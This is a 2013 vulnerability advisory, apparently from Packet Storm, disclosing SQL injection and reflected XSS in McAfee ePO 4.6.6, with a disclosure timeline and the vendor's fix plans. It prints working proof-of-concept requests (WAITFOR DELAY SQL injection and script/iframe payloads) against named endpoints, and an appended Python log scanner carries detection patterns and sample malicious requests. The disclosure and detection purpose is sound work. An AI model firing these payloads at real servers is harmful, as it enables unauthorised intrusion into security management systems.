
McAfee ePO 4.6.6 Cross Site Scripting / SQL Injection

Date: 12 Jul 2013
Reported by: Nuri Fattah
Type: packetstorm
Source: packetstormsecurity.com

McAfee ePO 4.6.6 Cross Site Scripting / SQL Injection vulnerabilities

`Classification: NON SENSITIVE INFORMATION RELEASABLE TO THE PUBLIC  
  
  
Multiple vulnerabilities in McAfee ePO 4.6.6  
  
Affected Product:  
McAfee ePO 4.6.6 Build 176 & (potentially) earlier versions  
  
Timeline:  
  
08 June 2013 - Vulnerability found  
12 June 2013 - Vendor informed  
12 June 2013 - Vendor replied/confirmed & opened service ticket  
12 July 2013 - Vendor responded with dates for solutions  
  
Credits:  
Nuri Fattah of NATO / NCIRC (www.ncirc.nato.int)  
  
CVE: To be assigned  
  
NCIRC ID: NCIRC-2013127-01  
  
Description:  
Multiple vulnerabilities, such as Cross-Site Scripting (XSS) and SQL  
injection were identified in the latest version of McAfee ePO (4.6.6).  
All identified vulnerabilities were discovered post authentication.  
  
  
Vulnerability Details:  
  
1. SQL injection  
  
a. GET /core/showRegisteredTypeDetails.do?registeredTypeID=epo.rt.computer&uid=6waitfor%20delay'0%3a0%3a20'--&index=0&datasourceID=&orion.user.security.token=2LoWTAOfWJ4ZCjxY&ajaxMode=standard HTTP/1.1  
  
b. /EPOAGENTMETA/DisplayMSAPropsDetail.do?registeredTypeID=epo.rt.computer&uid=1;%20WAITFOR%20DELAY%20'0:0:0';--&datasourceID=ListDataSource.orion.dashboard.chart.datasource.core.queryFactory%3Aquery.2&index=0 HTTP/1.1  
  
McAfee Solution:  
  
Item "a" will be addressed in ePO 4.6.7 due out in late Q3 2013.  
Item "b" has been addressed per Security Bulletin SB10043.  
(https://kc.mcafee.com/corporate/index?page=content&id=SB10043)  
  
  
  
  
2. Reflected XSS  
a. POST /core/loadDisplayType.do HTTP/1.1  
displayType=text_lookup&operator=eq&propKey=EPOLeafNode.AgentVersion&instanceId=<script>alert(182667)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard  
  
b. POST /console/createDashboardContainer.do HTTP/1.1  
displayType=text_lookup&operator=eq&propKey=EPOLeafNode.AgentVersion&instanceId=<script>alert(182667)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard  
  
c. POST /console/createDashboardContainer.do HTTP/1.1  
elementId=customURL.dashboard.factory%3Ainstance&index=2&pageid=30&width=1118&height=557&refreshInterval=5&refreshIntervalUnit=MIN&filteringEnabled=false&monitorUrl=http%3A%2F%2Fwww.xxxx.com"/></iframe><script>alert(111057)</script>&orion.user.security.token=9BslgbJEv2JqQy3k&ajaxMode=standard  
  
d. GET /ComputerMgmt/sysDetPanelBoolPie.do?uid=1";</script><script>alert(147981)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard HTTP/1.1  
  
e. GET /ComputerMgmt/sysDetPanelQry.do?uid=<script>alert(149031)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard HTTP/1.1  
  
f. GET /ComputerMgmt/sysDetPanelQry.do?uid=>"'><script>alert(30629)</script>&orion.user.security.token=>"'><script>alert(30629)</script>&ajaxMode=>"'><script>alert(30629)</script> HTTP/1.1  
  
g. GET /ComputerMgmt/sysDetPanelSummary.do?uid=<script>alert(146243)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard HTTP/1.1  
  
  
h. GET /ComputerMgmt/sysDetPanelSummary.do?uid=>"'><script>alert(30565)</script>&orion.user.security.token=>"'><script>alert(30565)</script>&ajaxMode=>"'><script>alert(30565)</script> HTTP/1.1  
  
  
McAfee Solution:  
  
Each of these items will be addressed in ePO 4.6.7 due out in late Q3  
2013.  
  
  
  
  
Nuri FATTAH  
CTR  
NATO Communications and Information Agency  
Engineering & Vulnerability Management Sections  
NATO Information Assurance Technical Centre  
SHAPE, 7010 Mons, Belgium  
T: +32 6544 6140 F: +32 6544 5414  
SHAPE NCN: 254 6140  
E: [email protected] W: www.ncirc.nato.int  
  
  
`
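
For triage on a server that has not yet been updated, the following added example (not part of the original advisory or any McAfee tooling) scans logged requests to the endpoints listed above for time-delay SQL fragments and script/iframe markup in any parameter. The rule names, the `scan` function and the sample requests are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Endpoints listed in the advisory (post-authentication ePO console handlers).
WATCHED_PATHS = {
    "/core/showRegisteredTypeDetails.do",
    "/EPOAGENTMETA/DisplayMSAPropsDetail.do",
    "/core/loadDisplayType.do",
    "/console/createDashboardContainer.do",
    "/ComputerMgmt/sysDetPanelBoolPie.do",
    "/ComputerMgmt/sysDetPanelQry.do",
    "/ComputerMgmt/sysDetPanelSummary.do",
}
# Rule names are this example's own labels.
RULES = {
    "sql-time-delay": re.compile(r"waitfor\s+delay", re.I),
    "script-injection": re.compile(r"<\s*/?\s*(script|iframe)\b", re.I),
}

def scan(request_line, body=""):
    """Return sorted (parameter, rule) hits for one logged request."""
    _method, rest = request_line.split(" ", 1)
    target = rest.rsplit(" ", 1)[0]          # drop the trailing HTTP version
    path, _, query = target.partition("?")
    if path not in WATCHED_PATHS:
        return []
    hits = set()
    # Split on '&' by hand: the SQL payloads contain ';', which some
    # query-string parsers treat as a parameter separator.
    for pair in filter(None, (query + "&" + body).split("&")):
        name, _, value = pair.partition("=")
        decoded = unquote_plus(value)
        for rule, pattern in RULES.items():
            if pattern.search(decoded):
                hits.add((unquote_plus(name), rule))
    return sorted(hits)

# Constructed sample requests, modelled on the advisory's request shapes.
SAMPLES = [
    ("GET /core/showRegisteredTypeDetails.do?registeredTypeID=epo.rt.computer&uid=6&index=0 HTTP/1.1", ""),
    ("GET /core/showRegisteredTypeDetails.do?uid=6waitfor%20delay'0%3a0%3a20'--&index=0 HTTP/1.1", ""),
    ("POST /console/createDashboardContainer.do HTTP/1.1",
     "index=2&monitorUrl=http%3A%2F%2Fexample.test%22/%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E"),
    ("GET /ComputerMgmt/sysDetPanelQry.do?uid=%3Cscript%3Ealert(1)%3C/script%3E&ajaxMode=standard HTTP/1.1", ""),
]

if __name__ == "__main__":
    for line, body in SAMPLES:
        print(scan(line, body), line.split("?")[0])
```

Because every finding in the advisory is post-authentication, a hit should be correlated with the authenticated console session that issued the request.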
